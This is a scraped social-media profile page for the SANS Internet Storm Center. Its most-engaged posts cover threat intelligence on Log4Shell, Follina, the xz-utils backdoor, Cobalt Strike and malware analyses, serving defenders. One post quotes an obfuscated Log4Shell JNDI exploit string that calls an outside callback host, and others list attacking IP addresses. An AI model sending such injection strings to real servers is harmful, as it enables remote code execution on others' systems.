SANS.edu Internet Storm Center
@sans_isc
Followers
115,730
Following
86
Media
2,373
Statuses
13,019
@sans_isc @infosec .exchange - - Global Network Security Information Sharing Community -
Jacksonville, FL, USA
Joined June 2007
Don't wanna be here?
Send us removal request.
Explore trending content on Musk Viewer
Rio Grande do Sul
• 183143 Tweets
Madonna
• 133989 Tweets
Tottenham
• 81023 Tweets
Spurs
• 73960 Tweets
Leverkusen
• 64676 Tweets
Palmer
• 56817 Tweets
Dame
• 52458 Tweets
#虎に翼
• 46040 Tweets
Ole Miss
• 35079 Tweets
#ラヴィット
• 32525 Tweets
Ange
• 28780 Tweets
bruno mars
• 27226 Tweets
憲法記念日
• 27062 Tweets
Pacers
• 20275 Tweets
FDNY
• 18840 Tweets
OUÇA FOI INTENSO
• 18302 Tweets
EP INTENSO ZNEC
• 18252 Tweets
Anne Hathaway
• 12710 Tweets
DANNY OCEAN
• 11556 Tweets
Lillard
• 11399 Tweets
#SnowMan結成12周年
• 10840 Tweets
Hunting phishing websites with favicon hashes
6
189
621
Brute-Force ZIP Password Cracking with : FP Fix
3
118
546
A quick note about xz-utils backdoor:
1 - luckily, this was caught early.
2 - most run xz-utils 5.2/5.4. 5.6 is bad.
3 - quick check: `xz -V`
4 - Thanks to people who paid attention
23
203
546
Example of how attackers are trying to push crypto miners via Log4Shell
5
154
450
#log4shell
is now a
@cnn
headline. This means: This is no longer an emergency. Going back to infocon green. Log4j will be a multi-year marathon. Do not treat it like a sprint or you will run out of breath quickly.
8
88
386
Broken phishing accidentally exploiting Outlook zero-day
5
128
329
Let's see if a kitten picture will get us to 100k followers by the end of the month ;-)
#networkcats
#kittens
#networksupportkitten
#evilbutcute
28
45
311
Over 20 thousand servers have their iLO exposed to the internet, many are outdated and vulnerable
8
120
307
Decrypting Cobalt Strike Traffic With a "Leaked" Private Key
0
103
279
Top sources of CVE-2021-44228 exploit attempts. 45.155.205.233 (hostway[.]ru), 171.25.193 (tor exits) 185.220.100.242 (tor exit) 18.27.197.252 (MIT[.]edu)
#log4j2
#log4j
#cve202144228
11
138
259
New Release of Sysmon Adding Detection for Process Tampering
2
70
255
Active Directory Certificate Services (ADCS - PKI) domain admin vulnerability
0
117
248
ISC diary: Emotet returns on Monday 2021-11-15, and
@malware_traffic
reviews recent activity
3
125
250
Seeing now
#log4shell
exploit attempts that obfuscate: ${jndi:${lower:l}${lower:d}a${lower:p}://world80[.]log4j[.]bin${upper:a}ryedge[.]io:80/callback} and also ldaps vs ldap. This particular attempt is from Binaryedge (researcher scans)
4
103
245
Simple Powershell Ransomware Creating a 7Z Archive of your Files
1
82
218
Decrypting Cobalt Strike Traffic With Keys Extracted From Process Memory
0
61
208
Malware Analysis with elastic-agent and Microsoft Sandbox
0
52
192
Please remember: Port 445 is just ONE of the ports that may reach
#RPC
(CVE-2022-26809) on Windows.
#MSRPC
does Port 135 (and high port) or in some cases HTTP as well. Don't "close some ports" but "only open ports you need open".
#allowlist
#dontblocklist
3
74
194
We are so far seeing 3 main types of useragents exploiting
#log4jshell
:
- "bingsearchlib[.]com" (not related to Bing/MSFT AFAIK)
- modified AutoMate 1.0 user agent
- user-agent with Base64 encoded exploit.
5
87
191
New Microsoft Office Attack Vector via "ms-msdt" Protocol Scheme
2
78
189
Tip: BASE64 Encoded PowerShell Scripts are Recognizable by the Amount of Letter As
3
94
189
The
#msdt
0-day currently being exploited can be blocked by removing the handler. Note that this may block legit uses (but not sure there are any/enough to not apply this workaround).
2
100
186
2
48
177
F5 BigIP vulnerability exploitation followed by a backdoor implant attempt
0
72
173
Analysis of a triple-encrypted AZORult downloader
2
92
172
Excel 4 Emotet Maldoc Analysis using CyberChef
6
52
165
First Exploitation of Follina Seen in the Wild
3
76
166
PuTTy And FileZilla Use The Same Fingerprint Registry Keys
1
39
161
Current Top IPs scanning for
#BigIP
#CVE20205902
@f5Networks
. cve-2020-5902
117.107.193.98 - Chinese EDU
103.220.209.47 - India Broadband
93.173.92.102 -Israel ISP
18.185.237.34 -Amazon EU
58.49.50.122 - Chinanet
52.119.83.108 -US Mobile ISP
179.9.166.185 -Chile ISP
7
76
153
Quickie: CyberChef & Microsoft Script Decoding
2
48
150
RCE in log4j, Log4Shell, or how things can get bad quickly
1
76
149
3
31
144
Facebook Outage: Yes, its DNS (sort of). A super quick analysis of what is going on.
2
79
143
Windows 10 Built-in Packet Sniffer - PktMon
1
65
141
HTML phishing attachments - now with anti-analysis features
4
54
134
Attackers are abusing MSBuild to evade defenses and implant Cobalt Strike beacons
0
62
131
Shipping to Elasticsearch Microsoft DNS Logs
0
37
131
After the initial flurry of scanning for the
#WebLogic
flaw yesterday, we are now seeing some "actual" exploit attempts. And of course, people poping calc.exe. If your WebLogic server has a Calculator running this morning: You have a problem!
2
79
130
Agent Tesla hidden in a historical anti-malware tool
1
49
123
ISC diary:
@malware_traffic
reviews an infection from 2020-10-30 for Emotet -> Qakbot -> more Emotet
1
40
127
0
44
121
2
41
125
Building an IDS Sensor with Suricata & Zeek with Logs to ELK
3
42
125
Hunting for Phishing Sites Masquerading as Outlook Web Access
3
35
122
Translating Saitama's DNS tunneling messages
1
48
119
Quick Tip: Extracting all VBA Code from a Maldoc
0
49
119
Malicious Excel Sheet with a NULL VT Score
4
49
112
Quick Tip: Extracting all VBA Code from a Maldoc - JSON Format
1
29
115
Malware analysis - From small BAT file to Mass Logger infostealer
0
38
113
Summer of SAM - incorrect permissions on Windows 10/11 hives
2
51
114
0
38
113
ISC diary:
@malware_traffic
offers another traffic anlaysis quiz with Windows-based malware traffic
3
27
114
ISC diary:
@malware_traffic
analyzes this month's forensic quiz
#BazaLoader
#CobaltStrike
#AnchorDNS
0
46
108
Meltdown and Spectre: clearing up the confusion
3
101
111
2
48
109
2
51
107
Log4Shell exploited to implant coin miners
0
39
105
1
47
106
ISC diary by
@malware_traffic
: yet another traffic anlaysis quiz with Windows-based malware traffic
4
30
105
1
56
105
Example of Cleartext Cobalt Strike Traffic (Thanks Brad)
0
27
102
Firefox confirms web-based exploitation of Meltdown/Spectre possible, patch ASAP.
https://blog.mozil
1
124
98
